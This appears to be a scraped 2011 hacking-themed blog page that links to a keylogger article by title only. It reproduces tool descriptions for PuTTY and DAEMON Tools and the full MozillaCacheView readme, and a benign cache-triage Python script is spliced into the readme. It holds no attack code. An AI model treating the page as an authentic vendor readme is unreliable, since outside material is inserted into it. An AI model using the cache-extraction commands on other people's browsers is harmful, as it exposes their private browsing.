| MALANG IS THE BEST JOURNEY EVER! |
| VISIT INDONESIA HACK YEAR 2o11-2o12 |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from : http://www.binushacker.net/key-logger-tool-pencuri-informasi.html
Tuesday, 24 May 2011
Saturday, 21 May 2011
Friday, 20 May 2011
Saturday, 14 May 2011
Download Accelerator Plus 8.6.1.4
Friday, 06 May 2011
putty-0.60-installer - client program
PuTTY is a client program for the SSH, Telnet and Rlogin network protocols.
These protocols are all used to run a remote session on a computer, over a network. PuTTY implements the client end of that session: the end at which the session is displayed, rather than the end at which it runs.
In really simple terms: you run PuTTY on a Windows machine, and tell it to connect to (for example) a Unix machine. PuTTY opens a window. Then, anything you type into that window is sent straight to the Unix machine, and everything the Unix machine sends back is displayed in the window. So you can work on the Unix machine as if you were sitting at its console, while actually sitting somewhere else.
This download includes the following tools:
PuTTY (the Telnet and SSH client itself)
PSCP (an SCP client, i.e. command-line secure file copy)
PSFTP (an SFTP client, i.e. general file transfer sessions much like FTP)
PuTTYtel (a Telnet-only client)
Plink (a command-line interface to the PuTTY back ends)
Pageant (an SSH authentication agent for PuTTY, PSCP and Plink)
PuTTYgen (an RSA and DSA key generation utility).
Wednesday, 04 May 2011
Mozilla Cache View - Basic View Data
MozillaCacheView v1.37
Copyright (c) 2007 - 2011 Nir Sofer
Web site: http://www.nirsoft.net
Description
===========
MozillaCacheView is a small utility that reads the cache folder of
Firefox/Mozilla/Netscape Web browsers, and displays the list of all files
currently stored in the cache. For each cache file, the following
information is displayed: URL, Content type, File size, Last modified
time, Last fetched time, Expiration time, Fetch count, Server name, and
more.
You can easily select one or more items from the cache list, and then
extract the files to another folder, or copy the URLs list to the
clipboard.
System Requirements
===================
This utility works on any version of Windows, from Windows 98 to Windows
7. You can use this utility even if Firefox/Mozilla is not installed on
your system, as long as you have the entire cache folder that you want to
inspect.
Versions History
================
* Version 1.37:
o The status bar now displays the total size of selected files in
KB/MB. (Only existing files are accumulated)
* Version 1.36:
o Fixed to work properly with the cache of Firefox 4 (Beta).
* Version 1.35:
o Added 'Open Selected Cache File' option. When you use this
option, the selected file is extracted into a temporary folder, and
then it's opened with the default file viewer. The temporary
file/folders are automatically deleted when you close
MozillaCacheView.
* Version 1.31:
o Added 'Add Header Line To CSV/Tab-Delimited File' option. When
this option is turned on, the column names are added as the first
line when you export to csv or tab-delimited file.
* Version 1.30:
o Fixed bug: /copycache failed to copy cache files stored inside
_CACHE_001_, _CACHE_002_, and _CACHE_003_ files.
o Fixed bug: For some Web sites (like Google Books), the 'Content
Type' column displayed wrong value.
* Version 1.27:
o Fixed bug: MozillaCacheView failed to copy cache files because
the filenames contained invalid file characters (?, :, *, |, and
others).
* Version 1.26:
o Add /sort option for sorting the cache list that you save from
command-line.
* Version 1.25:
o Added support for saving cache files from command-line.
* Version 1.21:
o Added new option in 'Copy Selected Cache Files': Update the
modified time of the copied files according to modified time in the
Web server.
* Version 1.20:
o Added support for cache filter. (Display only URLs which contain
the specified filter strings)
* Version 1.17:
o Fixed bug: in some cases, MozillaCacheView crashed when loading
the cache.
* Version 1.16:
o Added 'Hide Missing Cache Files' option.
o Fixed bug: In some systems, MozillaCacheView didn't display all
cache files.
* Version 1.15:
o New option in 'Copy Selected Cache Files To...': Save the files
in the directory structure of the Web site.
* Version 1.12:
o Added AutoComplete to the cache folders combo-box
* Version 1.11:
o Added 'Cache Control' and 'ETag' columns.
* Version 1.10:
o New option: Remember the selected cache folder.
* Version 1.09:
o The dialog-boxes are now resizable.
* Version 1.08:
o The URLs in HTML report are now created as links.
* Version 1.07:
o Added AutoComplete to 'Copy Selected Files To'.
o Fixed bug: The main window lost the focus when the user switched
to another application and then returned back to MozillaCacheView.
* Version 1.06:
o Added support for saving as comma-delimited text file.
* Version 1.05:
o New column: Cache Name.
o New column: Missing File.
o New option: Mark Missing Cache Files.
o Added new option:'Copy as new name if filename already exists'.
o Added new option: 'Delete Selected Cache Files' (Works only for
items that have a cache name).
* Version 1.02:
o Fixed the text-length limit problem in the cache folder combo-box.
* Version 1.01:
o Added filter by file type (application, image, text/html, video,
and audio)
o New Option: Show Zero-Length Files
o New Option: Show Files With Error Server Response.
* Version 1.00 - First release.
The Location Of Mozilla Cache Folder
====================================
The cache folder of Mozilla Firefox is located under
C:\Documents and Settings\[User Name]\Local Settings\Application Data\Mozilla\Firefox\Profiles\[Profile Name]\Cache
The cache folder of SeaMonkey is located under
C:\Documents and Settings\[User Name]\Local Settings\Application Data\Mozilla\Profiles\[Profile Name]\Cache
For other variants of Mozilla, you may find the cache folder under
C:\Documents and Settings\[User Name]\Application Data\Mozilla\Profiles\[Profile Name]\Cache
Using MozillaCacheView
======================
MozillaCacheView doesn't require any installation process or additional
DLL files. Just copy the executable file (MozillaCacheView.exe) to any
folder you like, and run it.
After you run it, the main window displays the list of files currently
stored in the cache of the Mozilla/Firefox profile that you last used.
If you want to view the cache of another profile, simply use
the 'Select Cache Folder' option (F9), and choose the desired cache
folder.
You can select one or more cache files from the list, and then export the
list into text/html/xml file ('Save Selected Items' option), copy the URL
list to the clipboard (Ctrl+U), copy the entire table of cache files
(Ctrl+C), and then paste it to Excel or to OpenOffice spreadsheet. You
can also extract the actual files from the cache, and save them into
another folder, by using the 'Copy Selected Cache Files To' option (F4).
Notice...
=========
In order to view the latest cache files, you must close all windows of
Firefox, because Firefox saves the cache index files to disk only when
you do that.
Notice For Delete Option
========================
When you delete files from the cache, MozillaCacheView deletes the cache
files, but it doesn't delete the reference to them in the cache index
file. This means that even after you delete files from the cache, you'll
still see them in the list, but the 'Missing File' column will be turned
from 'No' to 'Yes'.
Command-Line Options
====================
/stext <Filename>
Save the list of all cache files into a regular text file.
/stab <Filename>
Save the list of all cache files into a tab-delimited text file.
/scomma <Filename>
Save the list of all cache files into a comma-delimited text file.
/stabular <Filename>
Save the list of all cache files into a tabular text file.
/shtml <Filename>
Save the list of all cache files into HTML file (Horizontal).
/sverhtml <Filename>
Save the list of all cache files into HTML file (Vertical).
/sxml <Filename>
Save the list of all cache files to XML file.
/sort <column>
This command-line option can be used with other save options for sorting
by the desired column. If you don't specify this option, the list is
sorted according to the last sort that you made from the user interface.
The <column> parameter can specify the column index (0 for the first
column, 1 for the second column, and so on) or the name of the column,
like "Content Type" and "Filename". You can specify the '~' prefix
character (e.g: "~URL") if you want to sort in descending order. You can
put multiple /sort in the command-line if you want to sort by multiple
columns.
Examples:
MozillaCacheView.exe /shtml "f:\temp\1.html" /sort 2 /sort ~1
MozillaCacheView.exe /shtml "f:\temp\1.html" /sort "~Content Type" /sort "File Size"
/nosort
When you specify this command-line option, the list will be saved without
any sorting.
-folder <Cache Folder>
Start MozillaCacheView with the specified cache folder.
/copycache <URL> <Content Type>
Copy files from the cache into the folder specified in /CopyFilesFolder
parameter. In the <URL> parameter, you can specify the URL of the Web
site (for example: http://www.nirsoft.net) or empty string ("") if you
want to copy files from all Web sites. In the <Content Type> parameter,
you can specify full content type (like image/png), partial content type
(like 'image') or empty string ("") if you want to copy all types of
files.
/CopyFilesFolder <Folder>
Specifies the folder to copy the cache files.
/UseWebSiteDirStructure 0 | 1
Save the files in the directory structure of the Web site. 0 = No, 1 = Yes
/UpdateModifiedTime 0 | 1
Update the modified time of the copied files according to modified time
in the Web server. 0 = No, 1 = Yes
/NewNameIfExist 0 | 1
Copy as new name if filename already exists. 0 = No, 1 = Yes
Examples:
MozillaCacheView.exe -folder "C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\acf2c3u2.default\Cache"
MozillaCacheView.exe -folder "C:\Documents and Settings\Administrator\Local Settings\Application Data\Mozilla\Firefox\Profiles\acf2c3u2.default\Cache" /shtml c:\temp\mz.html
MozillaCacheView.exe /stext c:\temp\mz.txt
Copy Cache Examples:
* Copy all cache files of www.nirsoft.net to f:\temp in the directory
structure of the Web site:
/copycache "http://www.nirsoft.net" "" /CopyFilesFolder "f:\temp" /UseWebSiteDirStructure 1
* Copy all image cache files of www.nirsoft.net to f:\temp:
/copycache "http://www.nirsoft.net" "image" /CopyFilesFolder "f:\temp" /UseWebSiteDirStructure 0
* Copy all .png files from the cache to f:\temp:
/copycache "" "image/png" /CopyFilesFolder "f:\temp" /UseWebSiteDirStructure 0
* Copy all files from the cache to f:\temp:
/copycache "" "" /CopyFilesFolder "f:\temp" /UseWebSiteDirStructure 0
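One way to review a list saved with /scomma offline, as an added example that is not part of the MozillaCacheView readme: it pulls out entries whose cache file was deleted but is still referenced by the index (the 'Missing File' column described under Notice For Delete Option) and entries with executable or plug-in content types. The header names, the content-type list and the sample rows are assumptions constructed for illustration; compare them with a real export saved with the 'Add Header Line To CSV/Tab-Delimited File' option turned on.

```python
import csv
import io
from collections import Counter
from urllib.parse import urlsplit

# Constructed sample of a /scomma export saved with the header-line option on.
# Header names are assumed from the column names the readme lists.
SAMPLE_EXPORT = """\
URL,Content Type,Fetch Count,Server Name,Missing File
http://www.example.com/index.html,text/html; charset=UTF-8,3,Apache,No
http://www.example.com/logo.png,image/png,3,Apache,No
http://downloads.example.net/setup.exe,application/octet-stream,1,nginx,Yes
http://cdn.example.org/player.swf,application/x-shockwave-flash,2,nginx,No
"""

# Content types worth a second look during triage (assumed list, extend as needed).
ACTIVE_TYPES = {
    "application/octet-stream",
    "application/x-msdownload",
    "application/x-shockwave-flash",
    "application/java-archive",
}


def load_rows(text):
    """Parse the export into dictionaries keyed by the header line."""
    return list(csv.DictReader(io.StringIO(text)))


def triage(rows):
    """Return (deleted_urls, active_entries, hits_per_host) for a cache listing."""
    deleted, active, hosts = [], [], Counter()
    for row in rows:
        url = (row.get("URL") or "").strip()
        # Drop parameters such as "; charset=UTF-8" before comparing.
        ctype = (row.get("Content Type") or "").split(";")[0].strip().lower()
        hosts[urlsplit(url).hostname or "(no host)"] += 1
        # The index keeps the entry after the cache file itself is deleted.
        if (row.get("Missing File") or "").strip().lower() == "yes":
            deleted.append(url)
        if ctype in ACTIVE_TYPES:
            active.append((url, ctype))
    return deleted, active, hosts


if __name__ == "__main__":
    deleted, active, hosts = triage(load_rows(SAMPLE_EXPORT))
    print("Deleted from cache but still indexed:", deleted)
    print("Executable or plug-in content:", active)
    print("Entries per host:", hosts.most_common())
```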
Translating MozillaCacheView to other languages
===============================================
In order to translate MozillaCacheView to another language, follow the
instructions below:
1. Run MozillaCacheView with /savelangfile parameter:
MozillaCacheView.exe /savelangfile
A file named MozillaCacheView_lng.ini will be created in the folder of
MozillaCacheView utility.
2. Open the created language file in Notepad or in any other text
editor.
3. Translate all string entries to the desired language. Optionally,
you can also add your name and/or a link to your Web site.
(TranslatorName and TranslatorURL values) If you add this information,
it'll be used in the 'About' window.
4. After you finish the translation, run MozillaCacheView, and all
translated strings will be loaded from the language file.
If you want to run MozillaCacheView without the translation, simply
rename the language file, or move it to another folder.
License
=======
This utility is released as freeware. You are allowed to freely
distribute this utility via floppy disk, CD-ROM, Internet, or in any
other way, as long as you don't charge anything for this. If you
distribute this utility, you must include all files in the distribution
package, without any modification !
Disclaimer
==========
The software is provided "AS IS" without any warranty, either expressed
or implied, including, but not limited to, the implied warranties of
merchantability and fitness for a particular purpose. The author will not
be liable for any special, incidental, consequential or indirect damages
due to loss of data or any other reason.
Feedback
========
If you have any problem, suggestion, comment, or you found a bug in my
utility, you can send a message to nirsofer@yahoo.com
Tuesday, 03 May 2011
Sunday, 01 May 2011
DAEMON Tools Free - Media devices virtualization
- Create up to 4 virtual devices to mount several images simultaneously
- Customize virtual drives: change a drive letter, DVD region, etc
- Mount *.mdx, *.mds/*.mdf, *.iso, *.b5t, *.b6t, *.bwt, *.ccd, *.cdi, *.cue, *.nrg, *.pdi, *.isz disc images to a virtual drive
- Make .iso, *.mds/*.mdf and *.mdx images of CD/DVD/Blu-ray discs
- Protect images with password
- Compress your images
- Manage your Image Collection
- Get quick access to all functionalities via program icon in the System Tray
- Use File Associations to mount images right from Windows Explorer
- Use powerful Command Line Interface for automation purposes
- Perform basic actions via handy DAEMON Tools Gadget on Windows Desktop